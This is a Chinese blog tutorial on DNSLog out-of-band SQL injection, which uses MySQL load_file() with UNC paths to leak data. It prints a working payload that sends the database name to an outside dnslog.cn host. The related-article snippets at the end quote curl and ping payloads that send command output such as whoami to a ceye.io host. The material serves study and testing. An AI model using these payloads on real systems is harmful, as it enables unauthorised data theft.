DNSLog注入

最新推荐文章于 2024-04-17 21:49:28 发布
最新推荐文章于 2024-04-17 21:49:28 发布
阅读量1.1k 收藏 3
点赞数 3
分类专栏: SQL注入 文章标签: 安全 windows 数据库 SQL注入 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51295677/article/details/125480410
版权

这个漏洞不仅仅只是对SQL注入的利用,还是利用到load_file()这个函数解析DNS时带出的数据漏洞。

域名解析

域名不用说,懂点计算机的都听过,我想也大概了解DNS解析这个玩意儿。简单来说就是把一个域名通过一个服务器解析得到一个对应的IP地址,而这个解析的过程中又是一层一层的解析。

域名总共有5级,从右至左解析,从右至左域名等级降低。用点号 . 分割级别,低级别的域名要在高级别的域名中去解析,所以如果有一个域名为:zc1t6a.dnslog.cn ,而还有一个域名为database.zc1t6a.dnslog.cn,后者解析时在比他高级别的域名(即前面那个域名)中执行,这种解析会留下一些解析数据,也就可以理解为间接性的将敏感数据携带出来。

由于每一级域名的长度只能为63个字符,所以在MYSQL中获取到超过63个字节的字符时,会被当作一个错误的域名,不会产生去解析的动作,所以zc1t6a.dnslog.cn也不会收到解析的记录,所以我们就获取不到想要的信息了,如果遇到了大于63的就用substring()截断读取。

顺便一提,域名里还有一个规则,就是只能出现数字,字母,下划线等数据。所以如果在获取到的信息中包含了其他特殊符号时,load_file()就会认为是一个错误的域名,就不会去从网络中解析了。虽然如此但是方法总是有的比如replace替换,最后得到的数据我们再换回即可。

UNC路径

在了解UNC路径前看一个DNSLog注入payload

select load_file(concat('\\\\',(select database()),'.jtc581.dnslog.cn/abc'));

这里的payload有个让人不懂的问题,就是concat()的第一个参数用的是 '\\\\' ,如果把它替换为其他的数据会怎样呢?有兴趣可以自己试一下,如果替换了DNS解析就带不出数据了,为什么?这就是我想要说的UNC路径的格式,读取远程文件就要用到UNC路径

UNC(Universal Naming Convention),通用的命名规则,也称通用命名规范、通用命名约定。UNC为网络(主要指局域网)上资源的完整Windows 2000名称。

1、UNC路径就是类似\\softer这样的形式的网络路径(即前面是带双反斜杠的)。

2、UNC为网络(主要指局域网)上资源的完整Windows 2000名称。

格式:\\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。

目录或文件的UNC名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename

UNC共享就是指网络硬盘的共享,当访问softer计算机中名为it168的共享文件夹,用UNC表示就是\\softer\it168;如果是softer计算机的默认管理共享C$则用\\softer\c$来表示。

我们访问网上邻居所采用的命令行访问法,实际上应该称作UNC路径访问法。

以上UNC的解释来自百度百科)。

既然UNC的格式是两个反斜杠那我们用四个反斜杠干嘛?答案当然是因为反斜杠有着转义的作用,所以一个反斜杠转义另一个反斜杠,最后起到字面上反斜杠的意思的只有两个。

DNSLog利用的条件

DNSLog需要利用的load_file(),所以load_file()能使用的权限是必不可少的,load_file()的使用条件是root且配置得有一定要求,使用命令show variables like "%secure%"查询权限如下:

1、当secure_file_priv为空,就可以读取磁盘的目录。


2、当secure_file_priv为 /,就可以读取根目录 / 下的文件。


3、当secure_file_priv为NULL,load_file就不能加载文件。

如果为NULL,修改的方式如下

windows:修改my.ini 在[mysqld]内加入secure_file_priv = ''


linux:修改my.cnf 在[mysqld]内加入secure_file_priv =''

这个与into outfile into dumpfile 利用的条件类似。

前面说到DNS解析是低级别的在高级别的域名中解析,那么如果为了学习这玩意儿,我们每个人都需要买一个域名那太麻烦了。还好有一些平台给我们提供了可免费测试DNSLog的临时域名(太良心了)。

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

我个人是更偏向于第一个,主要是比较方便。

DNSLog注入测试

那么就简单测试一下查库、查表、查列、查字段中的查库了解一下。

使用load指令:

select load_file(concat('\\\\',(select database()),'.xiw0zu.dnslog.cn/abc'));

 

查库、查表、查列、查字段等就是用常规的手法加上之前写的绕过即可完成。

 做题目也是如此,在闭合以后能使用load_file()即可利用DNSLog注入

 

参考:UNC路径_weixin_33924312的博客-CSDN博客

UNC路径_百度百科

域名解析_打酱油的;的博客-CSDN博客_域名解析规则

DNSLog注入_两小姐的便利贴的博客-CSDN博客_dnslog注入

【老火柴擦出新火花】DNSlog高效率无回显渗透 - 脉脉

DNSlog注入详细解析 - FreeBuf网络安全行业门户

errorr0
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1756
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
DNSLog注入及SQLmap工具使用
2301_80034711的博客
03-18 910
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
DNSLog漏洞
最新发布
shirlly_的博客
04-17 433
DNS(Domain Name System)是一个用于将域名转换为与之对应的 IP 地址的分布式命名系统。DNS日志是记录特定设备或网络发出的所有DNS查询的记录。这些日志可用于排除DNS问题、监控网络活动和分析流量模式。DNS日志通常包括信息,如源IP地址、查询的域名、查询类型(如A记录、MX记录)以及从DNS服务器接收到的响应。没有回显的情况下怎么办?利用限制利用DNSLog服务中的漏洞进行数据窃取攻击。攻击者可以通过在受害者系统上植入恶意代码,使其发送DNS请求到恶意控制的DNSLog服务器
利用DNSlog技术间接判断漏洞是否存在的常用payload
nextdoor6的博客
06-13 4682
0x00 Command Execution i. *nix: curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io ii. windows ping %USERNAME%.b182oj.ceye.io 0x01 SQL Injection From http://docs.
DNSlog注入
kukudeshuo的博客
04-17 1780
DNSlog注入 什么是DNSlog 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。 那怎么利用DNSlog进行注入呢?得深入了解一下DNSlog 原理 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1407
盲注代替 DNS logDNS日志,域名解析的记录。
dnslog server
09-08
dnslog server
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键...
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
dnslog:简约的 DNS 日志记录工具
05-31
捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192....
DNSlog-GO:DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口
03-08
简介DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口安装详细图文教程: : 1.获取发行版这里下载最新发行版,并解压2.域名与公网IP准备搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS ...
Dns注入
qq_58000413的博客
09-20 659
DNS-LOG注入 linux能不能用的话[一般不能dnslog注入,除非搭建smb服务]LOAD_FILE(绝对路径) 记得反斜杠。database().hjw.com =>日志就会记录。mysql稍微高一点的版本,默认是不可以读取内容的。load_file 读取文件的函数。DNS-LOGDNS服务(LOG日志)=>DNS解析日志。文件共享(UNC路径)访问的东西都是把他当做文件处理。dns-log注入:obb(数据外带)Mysql函数:LOAD_FILE()
写bat脚本双击执行
qq_35911118的博客
04-08 2649
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
dfdhxb995397的博客
12-28 888
作者:Armyzer0 Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用! 符号:` `名称:反引号,上分隔符位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将...
DNSLOG注入
秋水的博客
09-02 8840
注入简介 什么是dnslog注入dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 为什么要进行dnslog注入? 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使...
dnslog在mysql在linux_DnslogSQL注入中的实战
weixin_30899023的博客
01-20 369
本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。然而在实际的运用中,因为环境的差异,利用也不同。本文详细的记录了在多种常见数据库实际运用过程的一些细节,包括POC的编写和原理,和一些网上没有公开的利用POC。0x01、关于DNSlog...
dnslog盲注原理
rane的博客
03-18 1826
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试...
深度剖析DNSLog注入原理&本地实例测试
monster663的博客
02-08 5980
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 Dns_log注入简介 我们将利用DNS解析的过程将留下痕迹和mysql中load_file()函数的能够访问互联网中的文件这一特点,将一些渗透的过程中将我们需要测试网站的结果回显到一个特定的可以记录DNS日志网站中,关于DNS的原理请参考https://blog.csdn.net/king9666/article/details/106022050 应用场景 DNS_log注入常用于网站对
dnslog注入
weixin_33928137的博客
12-21 270
   使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧。看到有人问过。http://zone.wooyun.org/content/27440其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info这样去获取数据什么的。windows下...
dnslog注入原理
07-29
DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值